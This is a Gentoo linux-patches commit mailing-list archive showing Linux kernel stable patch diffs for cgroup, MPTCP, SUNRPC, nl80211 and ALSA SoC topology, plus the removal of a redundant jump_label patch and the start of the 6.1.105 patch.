+diff --git a/kernel/cgroup/cgroup-internal.h b/kernel/cgroup/cgroup-internal.h
+index 367b0a42ada909..2fbd29a1c1e7f2 100644
+--- a/kernel/cgroup/cgroup-internal.h
++++ b/kernel/cgroup/cgroup-internal.h
+@@ -170,7 +170,8 @@ extern struct list_head cgroup_roots;
+ 
+ /* iterate across the hierarchies */
+ #define for_each_root(root)						\
+-	list_for_each_entry((root), &cgroup_roots, root_list)
++	list_for_each_entry_rcu((root), &cgroup_roots, root_list,	\
++				lockdep_is_held(&cgroup_mutex))
+ 
+ /**
+  * for_each_subsys - iterate all enabled cgroup subsystems
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 1e008ea467c0a1..489c25713edcb7 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1346,7 +1346,7 @@ static void cgroup_exit_root_id(struct cgroup_root *root)
+ 
+ void cgroup_free_root(struct cgroup_root *root)
+ {
+-	kfree(root);
++	kfree_rcu(root, rcu);
+ }
+ 
+ static void cgroup_destroy_root(struct cgroup_root *root)
+@@ -1379,7 +1379,7 @@ static void cgroup_destroy_root(struct cgroup_root *root)
+ 	spin_unlock_irq(&css_set_lock);
+ 
+ 	if (!list_empty(&root->root_list)) {
+-		list_del(&root->root_list);
++		list_del_rcu(&root->root_list);
+ 		cgroup_root_count--;
+ 	}
+ 
+@@ -1419,7 +1419,15 @@ static inline struct cgroup *__cset_cgroup_from_root(struct css_set *cset,
+ 		}
+ 	}
+ 
+-	BUG_ON(!res_cgroup);
++	/*
++	 * If cgroup_mutex is not held, the cgrp_cset_link will be freed
++	 * before we remove the cgroup root from the root_list. Consequently,
++	 * when accessing a cgroup root, the cset_link may have already been
++	 * freed, resulting in a NULL res_cgroup. However, by holding the
++	 * cgroup_mutex, we ensure that res_cgroup can't be NULL.
++	 * If we don't hold cgroup_mutex in the caller, we must do the NULL
++	 * check.
++	 */
+ 	return res_cgroup;
+ }
+ 
+@@ -1468,7 +1476,6 @@ static struct cgroup *current_cgns_cgroup_dfl(void)
+ static struct cgroup *cset_cgroup_from_root(struct css_set *cset,
+ 					    struct cgroup_root *root)
+ {
+-	lockdep_assert_held(&cgroup_mutex);
+ 	lockdep_assert_held(&css_set_lock);
+ 
+ 	return __cset_cgroup_from_root(cset, root);
+@@ -1476,7 +1483,9 @@ static struct cgroup *cset_cgroup_from_root(struct css_set *cset,
+ 
+ /*
+  * Return the cgroup for "task" from the given hierarchy. Must be
+- * called with cgroup_mutex and css_set_lock held.
++ * called with css_set_lock held to prevent task's groups from being modified.
++ * Must be called with either cgroup_mutex or rcu read lock to prevent the
++ * cgroup root from being destroyed.
+  */
+ struct cgroup *task_cgroup_from_root(struct task_struct *task,
+ 				     struct cgroup_root *root)
+@@ -2037,7 +2046,7 @@ void init_cgroup_root(struct cgroup_fs_context *ctx)
+ 	struct cgroup_root *root = ctx->root;
+ 	struct cgroup *cgrp = &root->cgrp;
+ 
+-	INIT_LIST_HEAD(&root->root_list);
++	INIT_LIST_HEAD_RCU(&root->root_list);
+ 	atomic_set(&root->nr_cgrps, 1);
+ 	cgrp->root = root;
+ 	init_cgroup_housekeeping(cgrp);
+@@ -2120,7 +2129,7 @@ int cgroup_setup_root(struct cgroup_root *root, u16 ss_mask)
+ 	 * care of subsystems' refcounts, which are explicitly dropped in
+ 	 * the failure exit path.
+ 	 */
+-	list_add(&root->root_list, &cgroup_roots);
++	list_add_rcu(&root->root_list, &cgroup_roots);
+ 	cgroup_root_count++;
+ 
+ 	/*
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index daf53d685b5f3d..d469ad6c6a0ba4 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -950,7 +950,8 @@ static bool check_fully_established(struct mptcp_sock *msk, struct sock *ssk,
+ 	}
+ 
+ 	if (((mp_opt->suboptions & OPTION_MPTCP_DSS) && mp_opt->use_ack) ||
+-	    ((mp_opt->suboptions & OPTION_MPTCP_ADD_ADDR) && !mp_opt->echo)) {
++	    ((mp_opt->suboptions & OPTION_MPTCP_ADD_ADDR) &&
++	     (!mp_opt->echo || subflow->mp_join))) {
+ 		/* subflows are fully established as soon as we get any
+ 		 * additional ack, including ADD_ADDR.
+ 		 */
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 2b5a5680f09acb..368886d3faac6c 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -352,7 +352,7 @@ mptcp_pm_del_add_timer(struct mptcp_sock *msk,
+ }
+ 
+ bool mptcp_pm_alloc_anno_list(struct mptcp_sock *msk,
+-			      const struct mptcp_pm_addr_entry *entry)
++			      const struct mptcp_addr_info *addr)
+ {
+ 	struct mptcp_pm_add_entry *add_entry = NULL;
+ 	struct sock *sk = (struct sock *)msk;
+@@ -360,10 +360,10 @@ bool mptcp_pm_alloc_anno_list(struct mptcp_sock *msk,
+ 
+ 	lockdep_assert_held(&msk->pm.lock);
+ 
+-	add_entry = mptcp_lookup_anno_list_by_saddr(msk, &entry->addr);
++	add_entry = mptcp_lookup_anno_list_by_saddr(msk, addr);
+ 
+ 	if (add_entry) {
+-		if (mptcp_pm_is_kernel(msk))
++		if (WARN_ON_ONCE(mptcp_pm_is_kernel(msk)))
+ 			return false;
+ 
+ 		sk_reset_timer(sk, &add_entry->add_timer,
+@@ -377,7 +377,7 @@ bool mptcp_pm_alloc_anno_list(struct mptcp_sock *msk,
+ 
+ 	list_add(&add_entry->list, &msk->pm.anno_list);
+ 
+-	add_entry->addr = entry->addr;
++	add_entry->addr = *addr;
+ 	add_entry->sock = msk;
+ 	add_entry->retrans_times = 0;
+ 
+@@ -524,8 +524,8 @@ __lookup_addr(struct pm_nl_pernet *pernet, const struct mptcp_addr_info *info,
+ 
+ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ {
++	struct mptcp_pm_addr_entry *local, *signal_and_subflow = NULL;
+ 	struct sock *sk = (struct sock *)msk;
+-	struct mptcp_pm_addr_entry *local;
+ 	unsigned int add_addr_signal_max;
+ 	unsigned int local_addr_max;
+ 	struct pm_nl_pernet *pernet;
+@@ -567,8 +567,6 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 
+ 	/* check first for announce */
+ 	if (msk->pm.add_addr_signaled < add_addr_signal_max) {
+-		local = select_signal_address(pernet, msk);
+-
+ 		/* due to racing events on both ends we can reach here while
+ 		 * previous add address is still running: if we invoke now
+ 		 * mptcp_pm_announce_addr(), that will fail and the
+@@ -579,16 +577,26 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		if (msk->pm.addr_signal & BIT(MPTCP_ADD_ADDR_SIGNAL))
+ 			return;
+ 
+-		if (local) {
+-			if (mptcp_pm_alloc_anno_list(msk, local)) {
+-				__clear_bit(local->addr.id, msk->pm.id_avail_bitmap);
+-				msk->pm.add_addr_signaled++;
+-				mptcp_pm_announce_addr(msk, &local->addr, false);
+-				mptcp_pm_nl_addr_send_ack(msk);
+-			}
+-		}
++		local = select_signal_address(pernet, msk);
++		if (!local)
++			goto subflow;
++
++		/* If the alloc fails, we are on memory pressure, not worth
++		 * continuing, and trying to create subflows.
++		 */
++		if (!mptcp_pm_alloc_anno_list(msk, &local->addr))
++			return;
++
++		__clear_bit(local->addr.id, msk->pm.id_avail_bitmap);
++		msk->pm.add_addr_signaled++;
++		mptcp_pm_announce_addr(msk, &local->addr, false);
++		mptcp_pm_nl_addr_send_ack(msk);
++
++		if (local->flags & MPTCP_PM_ADDR_FLAG_SUBFLOW)
++			signal_and_subflow = local;
+ 	}
+ 
++subflow:
+ 	/* check if should create a new subflow */
+ 	while (msk->pm.local_addr_used < local_addr_max &&
+ 	       msk->pm.subflows < subflows_max) {
+@@ -596,9 +604,14 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		bool fullmesh;
+ 		int i, nr;
+ 
+-		local = select_local_address(pernet, msk);
+-		if (!local)
+-			break;
++		if (signal_and_subflow) {
++			local = signal_and_subflow;
++			signal_and_subflow = NULL;
++		} else {
++			local = select_local_address(pernet, msk);
++			if (!local)
++				break;
++		}
+ 
+ 		fullmesh = !!(local->flags & MPTCP_PM_ADDR_FLAG_FULLMESH);
+ 
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 278ba5955dfd1d..f2b90053ecae78 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -225,7 +225,7 @@ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ 	lock_sock((struct sock *)msk);
+ 	spin_lock_bh(&msk->pm.lock);
+ 
+-	if (mptcp_pm_alloc_anno_list(msk, &addr_val)) {
++	if (mptcp_pm_alloc_anno_list(msk, &addr_val.addr)) {
+ 		msk->pm.add_addr_signaled++;
+ 		mptcp_pm_announce_addr(msk, &addr_val.addr, false);
+ 		mptcp_pm_nl_addr_send_ack(msk);
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 9e582725ccb412..4515cc6b649fc4 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -812,7 +812,7 @@ int mptcp_pm_nl_mp_prio_send_ack(struct mptcp_sock *msk,
+ 				 struct mptcp_addr_info *rem,
+ 				 u8 bkup);
+ bool mptcp_pm_alloc_anno_list(struct mptcp_sock *msk,
+-			      const struct mptcp_pm_addr_entry *entry);
++			      const struct mptcp_addr_info *addr);
+ void mptcp_pm_free_anno_list(struct mptcp_sock *msk);
+ bool mptcp_pm_sport_in_anno_list(struct mptcp_sock *msk, const struct sock *sk);
+ struct mptcp_pm_add_entry *
+diff --git a/net/sunrpc/stats.c b/net/sunrpc/stats.c
+index 52908f9e6eab54..9a0b3e8cc62d41 100644
+--- a/net/sunrpc/stats.c
++++ b/net/sunrpc/stats.c
+@@ -309,7 +309,7 @@ EXPORT_SYMBOL_GPL(rpc_proc_unregister);
+ struct proc_dir_entry *
+ svc_proc_register(struct net *net, struct svc_stat *statp, const struct proc_ops *proc_ops)
+ {
+-	return do_register(net, statp->program->pg_name, statp, proc_ops);
++	return do_register(net, statp->program->pg_name, net, proc_ops);
+ }
+ EXPORT_SYMBOL_GPL(svc_proc_register);
+ 
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index 666d738bcf07e4..9ae85347ab397a 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -453,8 +453,8 @@ __svc_init_bc(struct svc_serv *serv)
+  * Create an RPC service
+  */
+ static struct svc_serv *
+-__svc_create(struct svc_program *prog, unsigned int bufsize, int npools,
+-	     int (*threadfn)(void *data))
++__svc_create(struct svc_program *prog, struct svc_stat *stats,
++	     unsigned int bufsize, int npools, int (*threadfn)(void *data))
+ {
+ 	struct svc_serv	*serv;
+ 	unsigned int vers;
+@@ -466,7 +466,7 @@ __svc_create(struct svc_program *prog, unsigned int bufsize, int npools,
+ 	serv->sv_name      = prog->pg_name;
+ 	serv->sv_program   = prog;
+ 	kref_init(&serv->sv_refcnt);
+-	serv->sv_stats     = prog->pg_stats;
++	serv->sv_stats     = stats;
+ 	if (bufsize > RPCSVC_MAXPAYLOAD)
+ 		bufsize = RPCSVC_MAXPAYLOAD;
+ 	serv->sv_max_payload = bufsize? bufsize : 4096;
+@@ -528,26 +528,28 @@ __svc_create(struct svc_program *prog, unsigned int bufsize, int npools,
+ struct svc_serv *svc_create(struct svc_program *prog, unsigned int bufsize,
+ 			    int (*threadfn)(void *data))
+ {
+-	return __svc_create(prog, bufsize, 1, threadfn);
++	return __svc_create(prog, NULL, bufsize, 1, threadfn);
+ }
+ EXPORT_SYMBOL_GPL(svc_create);
+ 
+ /**
+  * svc_create_pooled - Create an RPC service with pooled threads
+  * @prog: the RPC program the new service will handle
++ * @stats: the stats struct if desired
+  * @bufsize: maximum message size for @prog
+  * @threadfn: a function to service RPC requests for @prog
+  *
+  * Returns an instantiated struct svc_serv object or NULL.
+  */
+ struct svc_serv *svc_create_pooled(struct svc_program *prog,
++				   struct svc_stat *stats,
+ 				   unsigned int bufsize,
+ 				   int (*threadfn)(void *data))
+ {
+ 	struct svc_serv *serv;
+ 	unsigned int npools = svc_pool_map_get();
+ 
+-	serv = __svc_create(prog, bufsize, npools, threadfn);
++	serv = __svc_create(prog, stats, bufsize, npools, threadfn);
+ 	if (!serv)
+ 		goto out_err;
+ 	return serv;
+@@ -1324,7 +1326,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 		goto err_bad_proc;
+ 
+ 	/* Syntactic check complete */
+-	serv->sv_stats->rpccnt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpccnt++;
+ 	trace_svc_process(rqstp, progp->pg_name);
+ 
+ 	/* Build the reply header. */
+@@ -1377,7 +1380,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 	goto close_xprt;
+ 
+ err_bad_rpc:
+-	serv->sv_stats->rpcbadfmt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadfmt++;
+ 	svc_putnl(resv, 1);	/* REJECT */
+ 	svc_putnl(resv, 0);	/* RPC_MISMATCH */
+ 	svc_putnl(resv, 2);	/* Only RPCv2 supported */
+@@ -1387,7 +1391,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ err_bad_auth:
+ 	dprintk("svc: authentication failed (%d)\n",
+ 		be32_to_cpu(rqstp->rq_auth_stat));
+-	serv->sv_stats->rpcbadauth++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadauth++;
+ 	/* Restore write pointer to location of accept status: */
+ 	xdr_ressize_check(rqstp, reply_statp);
+ 	svc_putnl(resv, 1);	/* REJECT */
+@@ -1397,7 +1402,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 
+ err_bad_prog:
+ 	dprintk("svc: unknown program %d\n", prog);
+-	serv->sv_stats->rpcbadfmt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadfmt++;
+ 	svc_putnl(resv, RPC_PROG_UNAVAIL);
+ 	goto sendit;
+ 
+@@ -1405,7 +1411,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 	svc_printk(rqstp, "unknown version (%d for prog %d, %s)\n",
+ 		       rqstp->rq_vers, rqstp->rq_prog, progp->pg_name);
+ 
+-	serv->sv_stats->rpcbadfmt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadfmt++;
+ 	svc_putnl(resv, RPC_PROG_MISMATCH);
+ 	svc_putnl(resv, process.mismatch.lovers);
+ 	svc_putnl(resv, process.mismatch.hivers);
+@@ -1414,7 +1421,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ err_bad_proc:
+ 	svc_printk(rqstp, "unknown procedure (%d)\n", rqstp->rq_proc);
+ 
+-	serv->sv_stats->rpcbadfmt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadfmt++;
+ 	svc_putnl(resv, RPC_PROC_UNAVAIL);
+ 	goto sendit;
+ 
+@@ -1423,7 +1431,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 
+ 	rpc_stat = rpc_garbage_args;
+ err_bad:
+-	serv->sv_stats->rpcbadfmt++;
++	if (serv->sv_stats)
++		serv->sv_stats->rpcbadfmt++;
+ 	svc_putnl(resv, ntohl(rpc_stat));
+ 	goto sendit;
+ }
+@@ -1469,7 +1478,8 @@ svc_process(struct svc_rqst *rqstp)
+ out_baddir:
+ 	svc_printk(rqstp, "bad direction 0x%08x, dropping request\n",
+ 		   be32_to_cpu(dir));
+-	rqstp->rq_server->sv_stats->rpcbadfmt++;
++	if (rqstp->rq_server->sv_stats)
++		rqstp->rq_server->sv_stats->rpcbadfmt++;
+ out_drop:
+ 	svc_drop(rqstp);
+ 	return 0;
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 214eee6105c7f2..dd9695306fb85d 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -463,6 +463,10 @@ nl80211_sta_wme_policy[NL80211_STA_WME_MAX + 1] = {
+ 	[NL80211_STA_WME_MAX_SP] = { .type = NLA_U8 },
+ };
+ 
++static struct netlink_range_validation q_range = {
++	.max = INT_MAX,
++};
++
+ static const struct nla_policy nl80211_policy[NUM_NL80211_ATTR] = {
+ 	[0] = { .strict_start_type = NL80211_ATTR_HE_OBSS_PD },
+ 	[NL80211_ATTR_WIPHY] = { .type = NLA_U32 },
+@@ -745,7 +749,7 @@ static const struct nla_policy nl80211_policy[NUM_NL80211_ATTR] = {
+ 
+ 	[NL80211_ATTR_TXQ_LIMIT] = { .type = NLA_U32 },
+ 	[NL80211_ATTR_TXQ_MEMORY_LIMIT] = { .type = NLA_U32 },
+-	[NL80211_ATTR_TXQ_QUANTUM] = { .type = NLA_U32 },
++	[NL80211_ATTR_TXQ_QUANTUM] = NLA_POLICY_FULL_RANGE(NLA_U32, &q_range),
+ 	[NL80211_ATTR_HE_CAPABILITY] =
+ 		NLA_POLICY_VALIDATE_FN(NLA_BINARY, validate_he_capa,
+ 				       NL80211_HE_MAX_CAPABILITY_LEN),
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index d3cbfa6a704f94..fcb8a36d4a06c1 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -1062,6 +1062,7 @@ static int soc_tplg_dapm_graph_elems_load(struct soc_tplg *tplg,
+ 	struct snd_soc_tplg_hdr *hdr)
+ {
+ 	struct snd_soc_dapm_context *dapm = &tplg->comp->dapm;
++	const size_t maxlen = SNDRV_CTL_ELEM_ID_NAME_MAXLEN;
+ 	struct snd_soc_tplg_dapm_graph_elem *elem;
+ 	struct snd_soc_dapm_route *route;
+ 	int count, i;
+@@ -1085,39 +1086,22 @@ static int soc_tplg_dapm_graph_elems_load(struct soc_tplg *tplg,
+ 		tplg->pos += sizeof(struct snd_soc_tplg_dapm_graph_elem);
+ 
+ 		/* validate routes */
+-		if (strnlen(elem->source, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) ==
+-			    SNDRV_CTL_ELEM_ID_NAME_MAXLEN) {
+-			ret = -EINVAL;
+-			break;
+-		}
+-		if (strnlen(elem->sink, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) ==
+-			    SNDRV_CTL_ELEM_ID_NAME_MAXLEN) {
+-			ret = -EINVAL;
+-			break;
+-		}
+-		if (strnlen(elem->control, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) ==
+-			    SNDRV_CTL_ELEM_ID_NAME_MAXLEN) {
++		if ((strnlen(elem->source, maxlen) == maxlen) ||
++		    (strnlen(elem->sink, maxlen) == maxlen) ||
++		    (strnlen(elem->control, maxlen) == maxlen)) {
+ 			ret = -EINVAL;
+ 			break;
+ 		}
+ 
+-		route->source = devm_kmemdup(tplg->dev, elem->source,
+-					     min(strlen(elem->source),
+-						 SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
+-					     GFP_KERNEL);
+-		route->sink = devm_kmemdup(tplg->dev, elem->sink,
+-					   min(strlen(elem->sink), SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
+-					   GFP_KERNEL);
++		route->source = devm_kstrdup(tplg->dev, elem->source, GFP_KERNEL);
++		route->sink = devm_kstrdup(tplg->dev, elem->sink, GFP_KERNEL);
+ 		if (!route->source || !route->sink) {
+ 			ret = -ENOMEM;
+ 			break;
+ 		}
+ 
+-		if (strnlen(elem->control, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) != 0) {
+-			route->control = devm_kmemdup(tplg->dev, elem->control,
+-						      min(strlen(elem->control),
+-							  SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
+-						      GFP_KERNEL);
++		if (strnlen(elem->control, maxlen) != 0) {
++			route->control = devm_kstrdup(tplg->dev, elem->control, GFP_KERNEL);
+ 			if (!route->control) {
+ 				ret = -ENOMEM;
+ 				break;
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index a2831076465409..a73358d753aa73 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -2090,6 +2090,20 @@ signal_address_tests()
+ 		chk_add_nr 1 1
+ 	fi
+ 
++	# uncommon: subflow and signal flags on the same endpoint
++	# or because the user wrongly picked both, but still expects the client
++	# to create additional subflows
++	if reset "subflow and signal together"; then
++		pm_nl_set_limits $ns1 0 2
++		pm_nl_set_limits $ns2 0 2
++		pm_nl_add_endpoint $ns2 10.0.3.2 flags signal,subflow
++		run_tests $ns1 $ns2 10.0.1.1
++		chk_join_nr 1 1 1
++		chk_add_nr 0 0 0         # none initiated by ns1
++		chk_rst_nr 0 0 invert    # no RST sent by the client
++		chk_rst_nr 0 0           # no RST sent by the server
++	fi
++
+ 	# accept and use add_addr with additional subflows
+ 	if reset "multiple subflows and signal"; then
+ 		pm_nl_set_limits $ns1 0 3


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-14 15:06 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-14 15:06 UTC (permalink / raw
  To: gentoo-commits

commit:     2a0746e7656990fa60429298671cbb8eedc928e9
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 14 15:05:36 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 14 15:05:36 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2a0746e7

Remove redundant patch

Removed:
2960_jump-label-fix.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README               |  4 ----
 2960_jump-label-fix.patch | 57 -----------------------------------------------
 2 files changed, 61 deletions(-)

diff --git a/0000_README b/0000_README
index e2c1d859..a89ea6e6 100644
--- a/0000_README
+++ b/0000_README
@@ -499,10 +499,6 @@ Patch:  2950_kbuild-CRC32-1MB-dict-xz-modules.patch
 From:   https://git.kernel.org/pub/scm/linux/kernel/git/masahiroy/linux-kbuild.git/commit/?h=kbuild&id=fbf5892df21a8ccfcb2fda0fd65bc3169c89ed28
 Desc:   kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules
 
-Patch:  2960_jump-label-fix.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/
-Desc:   jump_label: Fix a regression
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2960_jump-label-fix.patch b/2960_jump-label-fix.patch
deleted file mode 100644
index 1a5fdf7a..00000000
--- a/2960_jump-label-fix.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 224fa3552029a3d14bec7acf72ded8171d551b88 Mon Sep 17 00:00:00 2001
-From: Peter Zijlstra <peterz@infradead.org>
-Date: Wed, 31 Jul 2024 12:43:21 +0200
-Subject: jump_label: Fix the fix, brown paper bags galore
-
-Per the example of:
-
-  !atomic_cmpxchg(&key->enabled, 0, 1)
-
-the inverse was written as:
-
-  atomic_cmpxchg(&key->enabled, 1, 0)
-
-except of course, that while !old is only true for old == 0, old is
-true for everything except old == 0.
-
-Fix it to read:
-
-  atomic_cmpxchg(&key->enabled, 1, 0) == 1
-
-such that only the 1->0 transition returns true and goes on to disable
-the keys.
-
-Fixes: 83ab38ef0a0b ("jump_label: Fix concurrency issues in static_key_slow_dec()")
-Reported-by: Darrick J. Wong <djwong@kernel.org>
-Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
-Tested-by: Darrick J. Wong <djwong@kernel.org>
-Link: https://lkml.kernel.org/r/20240731105557.GY33588@noisy.programming.kicks-ass.net
----
- kernel/jump_label.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/kernel/jump_label.c b/kernel/jump_label.c
-index 4ad5ed8adf9691..6dc76b590703ed 100644
---- a/kernel/jump_label.c
-+++ b/kernel/jump_label.c
-@@ -236,7 +236,7 @@ void static_key_disable_cpuslocked(struct static_key *key)
- 	}
- 
- 	jump_label_lock();
--	if (atomic_cmpxchg(&key->enabled, 1, 0))
-+	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
- 		jump_label_update(key);
- 	jump_label_unlock();
- }
-@@ -289,7 +289,7 @@ static void __static_key_slow_dec_cpuslocked(struct static_key *key)
- 		return;
- 
- 	guard(mutex)(&jump_label_mutex);
--	if (atomic_cmpxchg(&key->enabled, 1, 0))
-+	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
- 		jump_label_update(key);
- 	else
- 		WARN_ON_ONCE(!static_key_slow_try_dec(key));
--- 
-cgit 1.2.3-korg
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-14 14:11 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-14 14:11 UTC (permalink / raw
  To: gentoo-commits

commit:     7e54b6e2477ea34e0449f6e35c418e158a256d8d
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 14 14:10:58 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 14 14:10:58 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=7e54b6e2

Linux patch 6.1.105

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1104_linux-6.1.105.patch | 5325 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5329 insertions(+)

diff --git a/0000_README b/0000_README
index e41d3db8..e2c1d859 100644
--- a/0000_README
+++ b/0000_README
@@ -459,6 +459,10 @@ Patch:  1103_linux-6.1.104.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.104
 
+Patch:  1104_linux-6.1.105.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.105
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1104_linux-6.1.105.patch b/1104_linux-6.1.105.patch
new file mode 100644
index 00000000..f65bfdcc
--- /dev/null
+++ b/1104_linux-6.1.105.patch
@@ -0,0 +1,5325 @@
+diff --git a/Documentation/admin-guide/cifs/usage.rst b/Documentation/admin-guide/cifs/usage.rst
+index a50047cf95ca2..1cd09795f1438 100644
+--- a/Documentation/admin-guide/cifs/usage.rst
++++ b/Documentation/admin-guide/cifs/usage.rst
+@@ -741,7 +741,7 @@ SecurityFlags		Flags which control security negotiation and
+ 			  may use NTLMSSP               		0x00080
+ 			  must use NTLMSSP           			0x80080
+ 			  seal (packet encryption)			0x00040
+-			  must seal (not implemented yet)               0x40040
++			  must seal                                     0x40040
+ 
+ cifsFYI			If set to non-zero value, additional debug information
+ 			will be logged to the system error log.  This field
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index e6f0570cf4900..8df4c1c5c6197 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -637,12 +637,6 @@
+ 			loops can be debugged more effectively on production
+ 			systems.
+ 
+-	clocksource.max_cswd_read_retries= [KNL]
+-			Number of clocksource_watchdog() retries due to
+-			external delays before the clock will be marked
+-			unstable.  Defaults to two retries, that is,
+-			three attempts to read the clock under test.
+-
+ 	clocksource.verify_n_cpus= [KNL]
+ 			Limit the number of CPUs checked for clocksources
+ 			marked with CLOCK_SOURCE_VERIFY_PERCPU that
+@@ -4556,11 +4550,9 @@
+ 
+ 	profile=	[KNL] Enable kernel profiling via /proc/profile
+ 			Format: [<profiletype>,]<number>
+-			Param: <profiletype>: "schedule", "sleep", or "kvm"
++			Param: <profiletype>: "schedule" or "kvm"
+ 				[defaults to kernel profiling]
+ 			Param: "schedule" - profile schedule points.
+-			Param: "sleep" - profile D-state sleeping (millisecs).
+-				Requires CONFIG_SCHEDSTATS
+ 			Param: "kvm" - profile VM exits.
+ 			Param: <number> - step/bucket size as a power of 2 for
+ 				statistical time based profiling.
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index 27135b9c07acb..6451e9198fef7 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -109,8 +109,16 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A76      | #1463225        | ARM64_ERRATUM_1463225       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A76      | #3324349        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A77      | #1508412        | ARM64_ERRATUM_1508412       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A77      | #3324348        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A78      | #3324344        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
